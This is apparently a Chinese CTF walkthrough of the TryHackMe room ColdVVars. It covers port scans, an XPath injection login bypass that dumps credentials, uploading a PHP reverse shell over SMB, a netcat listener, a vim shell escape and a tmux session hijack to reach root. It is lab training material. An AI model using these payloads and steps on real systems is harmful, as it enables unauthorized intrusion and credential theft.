打靶记录(一零五)之THMColdVVars

端口扫描

nmap --min-rate=10000 -p- 10.10.91.31
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-15 12:46 UTC
Nmap scan report for ip-10-10-91-31.eu-west-1.compute.internal (10.10.91.31)
Host is up (0.0053s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy
8082/tcp open  blackice-alerts
MAC Address: 02:1E:EF:37:89:5B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.03 seconds

nmap -sV -sC -sT -O -p139,445,8080,8082 10.10.91.31
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-15 12:47 UTC
Nmap scan report for ip-10-10-91-31.eu-west-1.compute.internal (10.10.91.31)
Host is up (0.00049s latency).

PORT     STATE SERVICE     VERSION
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8080/tcp open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Ubuntu Default Page: It works
8082/tcp open  http        Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 02:1E:EF:37:89:5B (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (93%), Linux 3.8 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: INCOGNITO

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: incognito
|   NetBIOS computer name: INCOGNITO\x00
|   Domain name: \x00
|   FQDN: incognito
|_  System time: 2024-03-15T12:47:23+00:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2024-03-15T12:47:23
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

Getshell

SMB用enum4linux扫描一下得到:

//10.10.91.31/SECURED   Mapping: DENIED Listing: N/A Writing: N/A

但是貌似不能直接连接，需要凭证

先看8080端口的web服务，扫描目录得到一个/dev,但是没有权限访问，但有一个note.txt，似乎存在文件上传功能?转向8082的nodejs,是个门户网站，在源码中发现注释/container，但是访问不了，/static也访问不了，猜测是8082端口那个服务的作用？但是有一个登录界面,房间提示用到Xpath注入，只有这里的登录服务有可能性了，因为是第一次遇到不太了解，根据

https://book.hacktricks.xyz/pentesting-web/xpath-injection

username输入” or “1”=”1，得到了

Username Password
Tove Jani
Godzilla KONGistheKING
SuperMan snyderCut
ArthurMorgan DeadEye

回到之前的smb，尝试着四个凭据，发现用ArthurMorgan|DeadEye可以登录,发现是与在8080的dev发现的相同的note.txt,第一想法尝试上传webshell来getshell，上传了一个txt文件，发现能够上传并且访问，尝试上传一个PHP反弹shell，开启监听,访问成功得到shell!

横向移动

然后可以转移到ArthurMorgan用户拿到userFlag,但是看了一下并没有什么可以提权的路径，除此之外还有一个marston用户

上传pspy查看进程，发现

python3 /home/marston/hicckup.py
/bin/bash /home/marston/run.sh
tmux new-session -d

但我们都查看不了这两个文件

没什么思路，看眼WP。

env
OPEN_PORT=4545

在环境变量中有一个OPEN_PORT

nc -lvnp 4545

然后收到了一个程序的连接,输入4能来到vim界面，在这之前需要用python完善一下shell的交互性

进到vim之后:!/bin/bash，我们拿到了marston的身份，run.sh和hickkup.py一起就是刚刚那个自动连接的应用程序了

提权

还有一个tmux开着

tmux ls
tmux ls
0: 9 windows (created Fri Mar 15 15:04:00 2024) [80x24]

有一个0号会话，连接

tmux attach-session -t 0

然后一直输入”exit”，直到我们来到一个root会话！

碎碎念

中等难度的靶机，还是挺难的啊。第一次接触Xpath,tmux，有机会研究研究